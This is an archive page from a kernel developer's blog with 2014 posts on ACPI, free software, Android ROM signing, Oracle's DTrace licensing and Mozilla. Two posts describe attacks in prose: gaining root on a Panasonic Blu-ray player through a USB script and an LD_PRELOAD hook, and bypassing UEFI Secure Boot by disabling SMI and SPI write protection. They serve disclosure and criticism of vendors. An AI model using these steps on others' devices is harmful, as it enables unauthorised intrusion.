2014-10-02 09:20 am
Entry tags:

Actions have consequences (or: why I'm not fixing Intel's bugs any more)

A lot of the kernel work I've ended up doing has involved dealing with bugs on Intel-based systems - figuring out interactions between their hardware and firmware, reverse engineering features that they refuse to document, improving their power management support, handling platform integration stuff for their GPUs and so on. Some of this I've been paid for, but a bunch has been unpaid work in my spare time[1].

Recently, as part of the anti-women #GamerGate campaign[2], a set of awful humans convinced Intel to terminate an advertising campaign because the site hosting the campaign had dared to suggest that the sexism present throughout the gaming industry might be a problem. Despite being awful humans, it is absolutely their right to request that a company choose to spend its money in a different way. And despite it being a dreadful decision, Intel is obviously entitled to spend their money as they wish. But I'm also free to spend my unpaid spare time as I wish, and I no longer wish to spend it doing unpaid work to enable an abhorrently-behaving company to sell more hardware. I won't be working on any Intel-specific bugs. I won't be reverse engineering any Intel-based features[3]. If the backlight on your laptop with an Intel GPU doesn't work, the number of fucks I'll be giving will fail to register on even the most sensitive measuring device.

On the plus side, this is probably going to significantly reduce my gin consumption.

[1] In the spirit of full disclosure: in some cases this has resulted in me being sent laptops in order to figure stuff out, and I was not always asked to return those laptops. My current laptop was purchased by me.

[2] I appreciate that there are some people involved in this campaign who earnestly believe that they are working to improve the state of professional ethics in games media. That is a worthy goal! But you're allying yourself to a cause that disproportionately attacks women while ignoring almost every other conflict of interest in the industry. If this is what you care about, find a new way to do it - and perhaps deal with the rather more obvious cases involving giant corporations, rather than obsessing over indie developers.

For avoidance of doubt, any comments arguing this point will be replaced with the phrase "Fart fart fart".

[3] Except for the purposes of finding entertaining security bugs
2014-09-23 11:08 pm
Entry tags:

My free software will respect users or it will be bullshit

I had dinner with a friend this evening and ended up discussing the FSF's four freedoms. The fundamental premise of the discussion was that the freedoms guaranteed by free software are largely academic unless you fall into one of two categories - someone who is sufficiently skilled in the arts of software development to examine and modify software to meet their own needs, or someone who is sufficiently privileged[1] to be able to encourage developers to modify the software to meet their needs.

The problem is that most people don't fall into either of these categories, and so the benefits of free software are often largely theoretical to them. Concentrating on philosophical freedoms without considering whether these freedoms provide meaningful benefits to most users risks these freedoms being perceived as abstract ideals, divorced from the real world - nice to have, but fundamentally not important. How can we tie these freedoms to issues that affect users on a daily basis?

In the past the answer would probably have been along the lines of "Free software inherently respects users", but reality has pretty clearly disproven that. Unity is free software that is fundamentally designed to tie the user into services that provide financial benefit to Canonical, with user privacy as a secondary concern. Despite Android largely being free software, many users are left with phones that no longer receive security updates[2]. Textsecure is free software but the author requests that builds not be uploaded to third party app stores because there's no meaningful way for users to verify that the code has not been modified - and there's a direct incentive for hostile actors to modify the software in order to circumvent the security of messages sent via it.

We're left in an awkward situation. Free software is fundamental to providing user privacy. The ability for third parties to continue providing security updates is vital for ensuring user safety. But in the real world, we are failing to make this argument - the freedoms we provide are largely theoretical for most users. The nominal security and privacy benefits we provide frequently don't make it to the real world. If users do wish to take advantage of the four freedoms, they frequently do so at a potential cost of security and privacy. Our focus on the four freedoms may be coming at a cost to the pragmatic freedoms that our users desire - the freedom to be free of surveillance (be that government or corporate), the freedom to receive security updates without having to purchase new hardware on a regular basis, the freedom to choose to run free software without having to give up basic safety features.

That's why projects like the GNOME safety and privacy team are so important. This is an example of tying the four freedoms to real-world user benefits, demonstrating that free software can be written and managed in such a way that it actually makes life better for the average user. Designing code so that users are fundamentally in control of any privacy tradeoffs they make is critical to empowering users to make informed decisions. Committing to meaningful audits of all network transmissions to ensure they don't leak personal data is vital in demonstrating that developers fundamentally respect the rights of those users. Working on designing security measures that make it difficult for a user to be tricked into handing over access to private data is going to be a necessary precaution against hostile actors, and getting it wrong is going to ruin lives.

The four freedoms are only meaningful if they result in real-world benefits to the entire population, not a privileged minority. If your approach to releasing free software is merely to ensure that it has an approved license and throw it over the wall, you're doing it wrong. We need to design software from the ground up in such a way that those freedoms provide immediate and real benefits to our users. Anything else is a failure.

(title courtesy of My Feminism will be Intersectional or it will be Bullshit by Flavia Dzodan. While I'm less angry, I'm solidly convinced that free software that does nothing to respect or empower users is an absolute waste of time)

[1] Either in the sense of having enough money that you can simply pay, having enough background in the field that you can file meaningful bug reports or having enough followers on Twitter that simply complaining about something results in people fixing it for you

[2] The free software nature of Android often makes it possible for users to receive security updates from a third party, but this is not always the case. Free software makes this kind of support more likely, but it is in no way guaranteed.
2014-09-16 02:03 pm
Entry tags:

ACPI, kernels and contracts with firmware

ACPI is a complicated specification - the latest version is 980 pages long. But that's because it's trying to define something complicated: an entire interface for abstracting away hardware details and making it easier for an unmodified OS to boot diverse platforms.

Inevitably, though, it can't define the full behaviour of an ACPI system. It doesn't explicitly state what should happen if you violate the spec, for instance. Obviously, in a just and fair world, no systems would violate the spec. But in the grim meathook future that we actually inhabit, systems do. We lack the technology to go back in time and retroactively prevent this, and so we're forced to deal with making these systems work.

This ends up being a pain in the neck in the x86 world, but it could be much worse. Way back in 2008 I wrote something about why the Linux kernel reports itself to firmware as "Windows" but refuses to identify itself as Linux. The short version is that "Linux" doesn't actually identify the behaviour of the kernel in a meaningful way. "Linux" doesn't tell you whether the kernel can deal with buffers being passed when the spec says it should be a package. "Linux" doesn't tell you whether the OS knows how to deal with an HPET. "Linux" doesn't tell you whether the OS can reinitialise graphics hardware.

Back then I was writing from the perspective of the firmware changing its behaviour in response to the OS, but it turns out that it's also relevant from the perspective of the OS changing its behaviour in response to the firmware. Windows 8 handles backlights differently to older versions. Firmware that's intended to support Windows 8 may expect this behaviour. If the OS tells the firmware that it's compatible with Windows 8, the OS has to behave compatibly with Windows 8.

In essence, if the firmware asks for Windows 8 support and the OS says yes, the OS is forming a contract with the firmware that it will behave in a specific way. If Windows 8 allows certain spec violations, the OS must permit those violations. If Windows 8 makes certain ACPI calls in a certain order, the OS must make those calls in the same order. Any firmware bug that is triggered by the OS not behaving identically to Windows 8 must be dealt with by modifying the OS to behave like Windows 8.

This sounds horrifying, but it's actually important. The existence of well-defined[1] OS behaviours means that the industry has something to target. Vendors test their hardware against Windows, and because Windows has consistent behaviour within a version[2] the vendors know that their machines won't suddenly stop working after an update. Linux benefits from this because we know that we can make hardware work as long as we're compatible with the Windows behaviour.

That's fine for x86. But remember when I said it could be worse? What if there were a platform that Microsoft weren't targeting? A platform where Linux was the dominant OS? A platform where vendors all test their hardware against Linux and expect it to have a consistent ACPI implementation?

Our even grimmer meathook future welcomes ARM to the ACPI world.

Software development is hard, and firmware development is software development with worse compilers. Firmware is inevitably going to rely on undefined behaviour. It's going to make assumptions about ordering. It's going to mishandle some cases. And it's the operating system's job to handle that. On x86 we know that systems are tested against Windows, and so we simply implement that behaviour. On ARM, we don't have that convenient reference. We are the reference. And that means that systems will end up accidentally depending on Linux-specific behaviour. Which means that if we ever change that behaviour, those systems will break.

So far we've resisted calls for Linux to provide a contract to the firmware in the way that Windows does, simply because there's been no need to - we can just implement the same contract as Windows. How are we going to manage this on ARM? The worst case scenario is that a system is tested against, say, Linux 3.19 and works fine. We make a change in 3.21 that breaks this system, but nobody notices at the time. Another system is tested against 3.21 and works fine. A few months later somebody finally notices that 3.21 broke their system and the change gets reverted, but oh no! Reverting it breaks the other system. What do we do now? The systems aren't telling us which behaviour they expect, so we're left with the prospect of adding machine-specific quirks. This isn't scalable.

Supporting ACPI on ARM means developing a sense of discipline around ACPI development that we simply haven't had so far. If we want to avoid breaking systems we have two options:

1) Commit to never modifying the ACPI behaviour of Linux.
2) Exposing an interface that indicates which well-defined ACPI behaviour a specific kernel implements, and bumping that whenever an incompatible change is made. Backward compatibility paths will be required if firmware only supports an older interface.

(1) is unlikely to be practical, but (2) isn't a great deal easier. Somebody is going to need to take responsibility for tracking ACPI behaviour and incrementing the exported interface whenever it changes, and we need to know who that's going to be before any of these systems start shipping. The alternative is a sea of ARM devices that only run specific kernel versions, which is exactly the scenario that ACPI was supposed to be fixing.

[1] Defined by implementation, not defined by specification
[2] Windows may change behaviour between versions, but always adds a new _OSI string when it does so. It can then modify its behaviour depending on whether the firmware knows about later versions of Windows.
2014-08-11 12:43 am

Birthplace

For tedious reasons, I will at this stage point out that I was born in Galway, Ireland.
2014-07-04 05:40 pm
Entry tags:

Self-signing custom Android ROMs

The security model on the Google Nexus devices is pretty straightforward. The OS is (nominally) secure and prevents anything from accessing the raw MTD devices. The bootloader will only allow the user to write to partitions if it's unlocked. The recovery image will only permit you to install images that are signed with a trusted key. In combination, these facts mean that it's impossible for an attacker to modify the OS image without unlocking the bootloader[1], and unlocking the bootloader wipes all your data. You'll probably notice that.

The problem comes when you want to run something other than the stock Google images. Step number one for basically all of these is "Unlock your bootloader", which is fair enough. Step number two is "Install a new recovery image", which is also reasonable in that the key database is stored in the recovery image and so there's no way to update it without doing so. Except, unfortunately, basically every third party Android image is either unsigned or is signed with the (publicly available) Android test keys, so this new recovery image will flash anything. Feel free to relock your bootloader - the recovery image will still happily overwrite your OS.

This is unfortunate. Even if you've encrypted your phone, anyone with physical access can simply reboot into recovery and reflash /system with something that'll stash your encryption key and mail your data to the NSA. Surely there's a better way of doing this?

Thankfully, there is. Kind of. It's annoying and involves a bunch of manual processes and you'll need to re-sign every update yourself. But it is possible to configure Nexus devices in such a way that you retain the same level of security you had when you were using the Google keys without losing the freedom to run whatever you want. Here's how.

Note: This is not straightforward. If you're not an experienced developer, you shouldn't attempt this. I'm documenting this so people can create more user-friendly approaches.

First: Unlock your bootloader. /data will be wiped.
Second: Get a copy of the stock recovery.img for your device. You can get it from the factory images available here
Third: Grab mkbootimg from here and build it. Run unpackbootimg against recovery.img.
Fourth: Generate some keys. Get this script and run it.
Fifth: zcat recovery.img-ramdisk.gz | cpio -id to extract your recovery image ramdisk. Do this in an otherwise empty directory.
Sixth: Get DumpPublicKey.java from here and run it against the .x509.pem file generated in step 4. Replace /res/keys from the recover image ramdisk with the output. Include the "v2" bit at the beginning.
Seventh: Repack the ramdisk image (find . | cpio -o -H newc | gzip > ../recovery.img-ramdisk.gz) and rebuild recovery.img with mkbootimg.
Eighth: Write the new recovery image to your device
Ninth: Get signapk from here and build it. Run it against the ROM you want to sign, using the keys you generated earlier. Make sure you use the -w option to sign the whole zip rather than signing individual files.
Tenth: Relock your bootloader
Eleventh: Boot into recovery mode and sideload your newly signed image.

At this point you'll want to set a reasonable security policy on the image (eg, if it grants root access, ensure that it requires a PIN or something), but otherwise you're set - the recovery image can't be overwritten without unlocking the bootloader and wiping all your data, and the recovery image will only write images that are signed with your key. For obvious reasons, keep the key safe.

This, well. It's obviously an excessively convoluted workflow. A *lot* of it could be avoided by providing a standardised mechanism for key management. One approach would be to add a new fastboot command for modifying the key database, and only permit this to be run when the bootloader is unlocked. The workflow would then be something like
  • Unlock bootloader
  • Generate keys
  • Install new key
  • Lock bootloader
  • Sign image
  • Install image
which seems more straightforward. Long term, individual projects could do the signing themselves and distribute their public keys, resulting in the install process becoming as easy as
  • Unlock bootloader
  • Install ROM key
  • Lock bootloader
  • Install ROM
which is actually easier than the current requirement to install an entirely new recovery image.

I'd actually previously criticised Google on the grounds that using custom keys wasn't possible on Android devices. I was wrong. It is, it's just that (as far as I can tell) nobody's actually documented it before. It's important that users not be forced into treating security and freedom as mutually exclusive, and it's great that Google have made that possible.

[1] This model fails if it's possible to gain root on the device. Thankfully this would never hold on what's that over there is that a distraction?
2014-05-18 10:53 pm
Entry tags:

The desktop and the developer

I was at the OpenStack Summit this week. The overwhelming majority of OpenStack deployments are Linux-based, yet the most popular laptop vendor (by a long way) at the conference was Apple. People are writing code with the intention of deploying it on Linux, but they're doing so under an entirely different OS.

But what's really interesting is the tools they're using to do so. When I looked over people's shoulders, I saw terminals and a web browser. They're not using Macs because their development tools require them, they're using Macs because of what else they get - an aesthetically pleasing OS, iTunes and what's easily the best trackpad hardware/driver combination on the market. These are people who work on the same laptop that they use at home. They'll use it when they're commuting, either for playing videos or for getting a head start so they can leave early. They use an Apple because they don't want to use different hardware for work and pleasure.

The developers I was surrounded by aren't the same developers you'd find at a technical conference 10 years ago. They grew up in an era that's become increasingly focused on user experience, and the idea of migrating to Linux because it's more tweakable is no longer appealing. People who spend their working day making use of free software (and in many cases even contributing or maintaining free software) won't run a free software OS because doing so would require them to compromise on things that they care about. Linux would give them the same terminals and web browser, but Linux's poorer multitouch handling is enough on its own to disrupt their workflow. Moving to Linux would slow them down.

But even if we fixed all those things, why would somebody migrate? The best we'd be offering is a comparable experience with the added freedom to modify more of their software. We can probably assume that this isn't a hugely compelling advantage, because otherwise it'd probably be enough to overcome some of the functional disparity. Perhaps we need to be looking at this differently.

When we've been talking about developer experience we've tended to talk about the experience of people who are writing software targeted at our desktops, not people who are incidentally using Linux to do their development. These people don't need better API documentation. They don't need a nicer IDE. They need a desktop environment that gives them access to the services that they use on a daily basis. Right now if someone opens an issue against one of their bugs, they'll get an email. They'll have to click through that in order to get to a webpage that lets them indicate that they've accepted the bug. If they know that the bug's already fixed in another branch, they'll probably need to switch to github in order to find the commit that contains the bug number that fixed it, switch back to their issue tracker and then paste that in and mark it as a duplicate. It's tedious. It's annoying. It's distracting.

If the desktop had built-in awareness of the issue tracker then they could be presented with relevant information and options without having to click through two separate applications. If git commits were locally indexed, the developer could find the relevant commit without having to move back to a web browser or open a new terminal to find the local checkout. A simple task that currently involves multiple context switches could be made significantly faster.

That's a simple example. The problem goes deeper. The use of web services for managing various parts of the development process removes the need for companies to maintain their own infrastructure, but in the process it tends to force developers to bounce between multiple websites that have different UIs and no straightforward means of sharing information. Time is lost to this. It makes developers unhappy.

A combination of improved desktop polish and spending effort on optimising developer workflows would stand a real chance of luring these developers away from OS X with the promise that they'd spend less time fighting web browsers, leaving them more time to get on with development. It would also help differentiate Linux from proprietary alternatives - Apple and Microsoft may spend significant amounts of effort on improving developer tooling, but they're mostly doing so for developers who are targeting their platforms. A desktop environment that made it easier to perform generic development would be a unique selling point.

I spoke to various people about this during the Summit, and it was heartening to hear that there are people who are already thinking about this and hoping to improve things. I'm looking forward to that, but I also hope that there'll be wider interest in figuring out how we can make things easier for developers without compromising other users. It seems like an interesting challenge.
2014-05-11 11:14 am
Entry tags:

Oracle continue to circumvent EXPORT_SYMBOL_GPL()

Oracle won their appeal regarding whether APIs are copyrightable. There'll be ongoing argument about whether Google's use of those APIs is fair use or not, and perhaps an appeal to the Supreme Court, but that's the new status quo. This will doubtless result in arguments over whether Oracle's implementation of Linux APIs in Solaris 10 was a violation of copyright or not (and presumably Google are currently checking whether they own any code that Oracle reimplemented), but that's not what I'm going to talk about today.

Oracle own some code called DTrace (Wikipedia has a good overview here - what it actually does isn't especially relevant) that was originally written as part of Solaris. When Solaris was released under the CDDL, so was DTrace. The CDDL is a file-level copyleft license with some restrictions not present in the GPL - as a result, combining GPLed code with CDDLed code will (in the absence of additional permission grants) result in a work that is under an inconsistent license and cannot legally be distributed.

Oracle wanted to make DTrace available for Linux as part of their Unbreakable Linux product. Integrating it directly into the kernel would obviously cause legal issues, so instead they implemented it as a kernel module. The copyright status of kernel modules is somewhat unclear. The GPL covers derivative works, but the definition of derivative works is a function of copyright law and judges. Making use of explicitly exported API may not be sufficient to constitute a derivative work - on the other hand, it might. This is largely untested in court. Oracle appear to believe that they're legitimate, and so have added just enough in-kernel code (and GPLed) to support DTrace, while keeping the CDDLed core of DTrace separate.

The kernel actually has two levels of exposed (non-userspace) API - those exported via EXPORT_SYMBOL() and those exported via EXPORT_SYMBOL_GPL(). Symbols exported via EXPORT_SYMBOL_GPL() may only be used by modules that claim to be GPLed, with the kernel refusing to load them otherwise. There is no technical limitation on the use of symbols exported via EXPORT_SYMBOL().

(Aside: this should not be interpreted as meaning that modules that only use symbols exported via EXPORT_SYMBOL() will not be considered derivative works. Anything exported via EXPORT_SYMBOL_GPL() is considered by the author to be so fundamental to the kernel that using it would be impossible without creating a derivative work. Using something exported via EXPORT_SYMBOL() may result in the creation of a derivative work. Consult lawyers before attempting to release a non-GPLed Linux kernel module)

DTrace integrates very tightly with the host kernel, and one of the things it needs access to is a high-resolution timer that is guaranteed to monotonically increase. Linux provides one in the form of ktime_get(). Unfortunately for Oracle, ktime_get() is only exported via EXPORT_SYMBOL_GPL(). Attempting to call it directly from the DTrace module would fail.

Oracle work around this in their (GPLed) kernel abstraction code. A function called dtrace_gethrtimer() simply returns the value of ktime_get(). dtrace_gethrtimer() is exported via EXPORT_SYMBOL() and therefore can be called from the DTrace module.

So, in the face of a technical mechanism designed to enforce the author's beliefs about the copyright status of callers of this function, Oracle deliberately circumvent that technical mechanism by simply re-exporting the same function under a new name. It should be emphasised that calling an EXPORT_SYMBOL_GPL() function does not inherently cause the caller to become a derivative work of the kernel - it only represents the original author's opinion of whether it would. You'd still need a court case to find out for sure. But if it turns out that the use of ktime_get() does cause a work to become derivative, Oracle would find it fairly difficult to argue that their infringement was accidental.

Of course, as copyright holders of DTrace, Oracle could solve the problem by dual-licensing DTrace under the GPL as well as the CDDL. The fact that they haven't implies that they think there's enough value in keeping it under an incompatible license to risk losing a copyright infringement suit. This might be just the kind of recklessness that Oracle accused Google of back in their last case.
2014-04-20 07:39 pm
Entry tags:

Home entertainment implementations are pretty appalling

I picked up a Panasonic BDT-230 a couple of months ago. Then I discovered that even though it appeared fairly straightforward to make it DVD region free (I have a large pile of PAL region 2 DVDs), the US models refuse to play back PAL content. We live in an era of software-defined functionality. While Panasonic could have designed a separate hardware SKU with a hard block on PAL output, that would seem like unnecessary expense. So, playing with the firmware seemed like a reasonable start.

Panasonic provide a nice download site for firmware updates, so I grabbed the most recent and set to work. Binwalk found a squashfs filesystem, which was a good sign. Less good was the block at the end of the firmware with "RSA" written around it in large letters. The simple approach of hacking the firmware, building a new image and flashing it to the device didn't appear likely to work.

Which left dealing with the installed software. The BDT-230 is based on a Mediatek chipset, and like most (all?) Mediatek systems runs a large binary called "bdpprog" that spawns about eleventy billion threads and does pretty much everything. Runnings strings over that showed, well, rather a lot, but most promisingly included a reference to "/mnt/sda1/vudu/vudu.sh". Other references to /mnt/sda1 made it pretty clear that it was the mount point for USB mass storage. There were a couple of other constraints that had to be satisfied, but soon attempting to run Vudu was actually setting a blank root password and launching telnetd.

/acfg/config_file_global.txt was the next stop. This is a set of tokens and values with useful looking names like "IDX_GB_PTT_COUNTRYCODE". I tried changing the values, but unfortunately made a poor guess - on next reboot, the player had reset itself to DVD region 5, Blu Ray region C and was talking to me in Russian. More inconveniently, the Vudu icon had vanished and I couldn't launch a shell any more.

But where there's one obvious mechanism for running arbitrary code, there's probably another. /usr/local/bin/browser.sh contained the wonderful line:
export LD_PRELOAD=/mnt/sda1/bbb/libSegFault.so
, so then it was just a matter of building a library that hooked open() and launched inetd and dropping that into the right place, and then opening the browser.

This time I set the country code correctly, rebooted and now I can actually watch Monkey Dust again. Hurrah! But, at the same time, concerning. This software has been written without any concern for security, and it listens on the network by default. If it took me this little time to find two entirely independent ways to run arbitrary code on the device, it doesn't seem like a stretch to believe that there are probably other vulnerabilities that can be exploited with less need for physical access.

The depressing part of this is that there's no reason to believe that Panasonic are especially bad here - especially since a large number of vendors are shipping much the same Mediatek code, and so probably have similar (if not identical) issues. The future is made up of network-connected appliances that are using your electricity to mine somebody else's Dogecoin. Our nightmarish dystopia may be stranger than expected.
2014-04-13 09:43 pm
Entry tags:

Real-world Secure Boot attacks

MITRE gave a presentation on UEFI Secure Boot at SyScan earlier this month. You should read the the presentation and paper, because it's really very good.

It describes a couple of attacks. The first is that some platforms store their Secure Boot policy in a run time UEFI variable. UEFI variables are split into two broad categories - boot time and run time. Boot time variables can only be accessed while in boot services - the moment the bootloader or kernel calls ExitBootServices(), they're inaccessible. Some vendors chose to leave the variable containing firmware settings available during run time, presumably because it makes it easier to implement tools for modifying firmware settings at the OS level. Unfortunately, some vendors left bits of Secure Boot policy in this space. The naive approach would be to simply disable Secure Boot entirely, but that means that the OS would be able to detect that the system wasn't in a secure state[1]. A more subtle approach is to modify the policy, such that the firmware chooses not to verify the signatures on files stored on fixed media. Drop in a new bootloader and victory is ensured.

But that's not a beautiful approach. It depends on the firmware vendor having made that mistake. What if you could just rewrite arbitrary variables, even if they're only supposed to be accessible in boot services? Variables are all stored in flash, connected to the chipset's SPI controller. Allowing arbitrary access to that from the OS would make it straightforward to modify the variables, even if they're boot time-only. So, thankfully, the SPI controller has some control mechanisms. The first is that any attempt to enable the write-access bit will cause a System Management Interrupt, at which point the CPU should trap into System Management Mode and (if the write attempt isn't authorised) flip it back. The second is to disable access from the OS entirely - all writes have to take place in System Management Mode.

The MITRE results show that around 0.03% of modern machines enable the second option. That's unfortunate, but the first option should still be sufficient[2]. Except the first option requires on the SMI actually firing. And, conveniently, Intel's chipsets have a bit that allows you to disable all SMI sources[3], and then have another bit to disable further writes to the first bit. Except 40% of the machines MITRE tested didn't bother setting that lock bit. So you can just disable SMI generation, remove the write-protect bit on the SPI controller and then write to arbitrary variables, including the SecureBoot enable one.

This is, uh, obviously a problem. The good news is that this has been communicated to firmware and system vendors and it should be fixed in the future. The bad news is that a significant proportion of existing systems can probably have their Secure Boot implementation circumvented. This is pretty unsurprisingly - I suggested that the first few generations would be broken back in 2012. Security tends to be an iterative process, and changing a branch of the industry that's historically not had to care into one that forms the root of platform trust is a difficult process. As the MITRE paper says, UEFI Secure Boot will be a genuine improvement in security. It's just going to take us a little while to get to the point where the more obvious flaws have been worked out.

[1] Unless the malware was intelligent enough to hook GetVariable, detect a request for SecureBoot and then give a fake answer, but who would do that?
[2] Impressively, basically everyone enables that.
[3] Great for dealing with bugs caused by YOUR ENTIRE COMPUTER BEING INTERRUPTED BY ARBITRARY VENDOR CODE, except unfortunately it also probably disables chunks of thermal management and stops various other things from working as well.
2014-04-03 03:18 pm
Entry tags:

Mozilla and leadership

A post I wrote back in 2012 got linked from a couple of the discussions relating to Brendan Eich being appointed Mozilla CEO. The tldr version is "If members of your community doesn't trust their leader socially, the leader's technical competence is irrelevant". That seems to have played out here.

In terms of background[1]: in 2008, Brendan donated money to the campaign for Proposition 8, a Californian constitutional amendment that expressly defined marriage as being between one man and one woman[2]. Both before and after that he had donated money to a variety of politicians who shared many political positions, including the definition of marriage as being between one man and one woman[3].

Mozilla is an interesting organisation. It consists of the for-profit Mozilla Corporation, which is wholly owned by the non-profit Mozilla Foundation. The Corporation's bylaws require it to work to further the Foundation's goals, and any profit is reinvested in Mozilla. Mozilla developers are employed by the Corporation rather than the Foundation, and as such the CEO is responsible for ensuring that those developers are able to achieve those goals.

The Mozilla Manifesto discusses individual liberty in the context of use of the internet, not in a wider social context. Brendan's appointment was very much in line with the explicit aims of both the Foundation and the Corporation - whatever his views on marriage equality, nobody has seriously argued about his commitment to improving internet freedom. So, from that perspective, he should have been a fine choice.

But that ignores the effect on the wider community. People don't attach themselves to communities merely because of explicitly stated goals - they do so because they feel that the community is aligned with their overall aims. The Mozilla community is one of the most diverse in free software, at least in part because Mozilla's stated goals and behaviour are fairly inspirational. People who identify themselves with other movements backing individual liberties are likely to identify with Mozilla. So, unsurprisingly, there's a large number of socially progressive individuals (LGBT or otherwise) in the Mozilla community, both inside and outside the Corporation.

A CEO who's donated money to strip rights[4] from a set of humans will not be trusted by many who believe that all humans should have those rights. It's not just limited to individuals directly affected by his actions - if someone's shown that they're willing to strip rights from another minority for political or religious reasons, what's to stop them attempting to do the same to you? Even if you personally feel safe, do you trust someone who's willing to do that to your friends? In a community that's made up of many who are either LGBT or identify themselves as allies, that loss of trust is inevitably going to cause community discomfort.

The first role of a leader should be to manage that. Instead, in the first few days of Brendan's leadership, we heard nothing of substance - at best, an apology for pain being caused rather than an apology for the act that caused the pain. And then there was an interview which demonstrated remarkable tone deafness. He made no attempt to alleviate the concerns of the community. There were repeated non-sequiturs about Indonesia. It sounded like he had no idea at all why the community that he was now leading was unhappy.

And, today, he resigned. It's easy to get into hypotheticals - could he have compromised his principles for the sake of Mozilla? Would an initial discussion of the distinction between the goals of members of the Mozilla community and the goals of Mozilla itself have made this more palatable? If the board had known this would happen, would they have made the same choice - and if they didn't know, why not?

But that's not the real point. The point is that the community didn't trust Brendan, and Brendan chose to leave rather than do further harm to the community. Trustworthy leadership is important. Communities should reflect on whether their leadership reflects not only their beliefs, but the beliefs of those that they would like to join the community. Fail to do so and you'll drive them away instead.

[1] For people who've been living under a rock
[2] Proposition 8 itself was a response to an ongoing court case that, at the point of Proposition 8 being proposed, appeared likely to support the overturning of Proposition 22, an earlier Californian ballot measure that legally (rather than constitutionally) defined marriage as being between one man and one woman. Proposition 22 was overturned, and for a few months before Proposition 8 passed, gay marriage was legal in California.
[3] http://www.theguardian.com/technology/2014/apr/02/controversial-mozilla-ceo-made-donations-right-wing-candidates-brendan-eich
[4] Brendan made a donation on October 25th, 2008. This postdates the overturning of Proposition 22, and as such gay marriage was legal in California at the time of this donation. Donating to Proposition 8 at that point was not about supporting the status quo, it was about changing the constitution to forbid something that courts had found was protected by the state constitution.
2014-03-23 11:39 pm
Entry tags:

What free software means to me

I was awarded the Free Software Foundation Award for the Advancement of Free Software this weekend[1]. I'd been given some forewarning, and I spent a bunch of that time thinking about how free software had influenced my life. It turns out that it's a lot.

I spent most of the 90s growing up in an environment that was rather more interested in cattle than in computers, and had very little internet access during that time. My entire knowledge of the wider free software community came from a couple of CDs that contained a copy of the jargon file, the source code to the entire GNU project and an early copy of the m68k Linux kernel.

But that was enough. Before I'd even got to university, I knew what free software was. I'd had the opportunity to teach myself how an operating system actually worked. I'd seen the benefits of being able to modify software and share those modifications with others. I met other people with the same interests. I ended up with a job writing free software and collaborating with others on integrating it with upstream code. And, from there, I became more and more involved with a wider range of free software communities, finding an increasing number of opportunities to help make changes that benefited both me and others.

Without free software I'd have started years later. I'd have lost the opportunity to collaborate with people spread over the entire world. My first job would have looked very different, as would my entire career since then. Without free software, almost everything I've achieved in my adult life would have been impossible.

To me, free software means I've lived a significantly better life than would otherwise have been the case. But more than that, it means doing what I can to make sure that other people have the same opportunities. I am here because of the work of others. The most rewarding part of my continued involvement is the knowledge that I am part of a countless number of people working to make sure that others can tell the same story in future.

[1] I'd link to the actual press release, but it contains possibly the worst photograph of me in the entire history of the universe
2014-03-12 03:37 pm
Entry tags:

Dealing with Apple ACPI issues

I wrote about Thunderbolt on Apple hardware a while ago. Since then Andreas Noever has somehow managed to write a working Thunderbolt stack, which awesome! But there was still the problem I mentioned of the device not appearing unless you passed acpi_osi="Darwin" on the kernel command line, and a further problem that if you suspended and then resumed it vanished again.

The ACPI _OSI interface is a mechanism for the firmware to determine the OS that the system is running. It turns out that this works fine for operating systems that export fairly static interfaces (Windows, which adds a new _OSI per release) and poorly for operating systems that don't even guarantee any kind of interface stability in security releases (Linux, which claimed to be "Linux" regardless of version until we turned that off). OS X claims to be Darwin and nothing else. As I mentioned before, claiming to be Darwin in addition to Windows was enough to get the Thunderbolt hardware to stay alive after boot, but it wasn't enough to get it powered up again after suspend.

It turns out that there's two sections of ACPI code where this Mac checks _OSI. The first is something like:

if (_OSI("Darwin")) Store 0x2710 OSYS; else if(_OSI("Windows 2009") Store 0x7D9 OSYS; else…

ie, if the OS claims to be Darwin, all other strings are ignored. This is called from \_SB._INI(), which is the first ACPI method the kernel executes. The check for whether to power down the Thunderbolt controller occurs after this and then works correctly.

The second version is less helpful. It's more like:

if (_OSI("Darwin")) Store 0x2710 OSYS; if (_OSI("Windows 2009")) Store 0x7D9 OSYS; if…

ie, if the OS claims to be both Darwin and Windows 2009 (which Linux will if you pass acpi_osi="Darwin"), the OSYS variable gets set to the Windows 2009 value. This version gets called during PCI initialisation, and once it's run all the other Thunderbolt ACPI calls stop doing anything and the controller gets powered down after suspend/resume. That can be fixed easily enough by special casing Darwin. If the platform requests Darwin before anything else, we'll just stop claiming to be Windows.

Phew. Working Thunderbolt! (Well, almost - _OSC fails and so we disable PCIe hotplug, but that's easy to work around). But boo, no working battery. Apple do something very strange with their ACPI battery interface. If you're running anything that doesn't claim to be Darwin, Apple expose an ACPI Control Method battery. Control Method interfaces abstract the complexity away into either ACPI bytecode or system management traps - the OS simply calls an ACPI method, magic happens and it gets an answer back. If you claim to be Darwin, Apple remove that interface and instead expose the raw ACPI Smart Battery System interface. This provides an i2c bus over which the OS must then speak the Smart Battery System protocol, allowing it to directly communicate with the battery.

Linux has support for this, but it seems that this wasn't working so well and hadn't been for years. Loading the driver resulted in modprobe hanging until a timeout occurred, and most accesses to the battery would (a) take forever and (b) probably fail. It also had the nasty habit of breaking suspend and resume, which was unfortunate since getting Thunderbolt working over suspend and resume was the whole point of this exercise.

So. I modified the sbs driver to dump every command it sent over the i2c bus and every response it got. Pretty quickly I found that the failing operation was a write - specifically, a write used to select which battery should be connected to the bus. Interestingly, Apple implemented their Control Method interface by just using ACPI bytecode to speak the SBS protocol. Looking at the code in question showed that they never issued any writes, and the battery worked fine anyway. So why were we writing? SBS provides a command to tell you the current state of the battery subsystem, including which battery (out of a maximum of 4) is currently selected. Unsurprisingly, calling this showed that the battery we wanted to talk to was already selected. We then asked the SBS manager to select it anyway, and the manager promptly fell off the bus and stopped talking to us. In keeping with the maxim of "If hardware complains when we do something, and if we don't really need to do that, don't do that", this makes it work.

Working Thunderbolt and working battery. We're even getting close to getting switchable GPU support working reasonably, which is probably just going to involve rewriting the entirety of fbcon or something similarly amusing.
2014-03-09 11:48 pm
Entry tags:

The simple things in life

I've spent a while trying to make GPU switching work more reliably on Apple hardware, and got to the point where my Retina MBP now comes up with X running on Intel regardless of what the firmware wanted to do (test patches here. But in the process I'd introduced an additional GPU switch which added another layer of flicker to the boot process. I spent some time staring at driver code and poking registers trying to figure out how I could let i915 probe EDID from the panel without switching the display over and made no progress at all.

And then I realised that nouveau already has all the information that i915 wants, and maybe we could just have the Switcheroo code hand that over instead of forcing i915 to probe again. Sigh.
2014-02-23 10:32 am
Entry tags:

The importance of a community-focused mindset

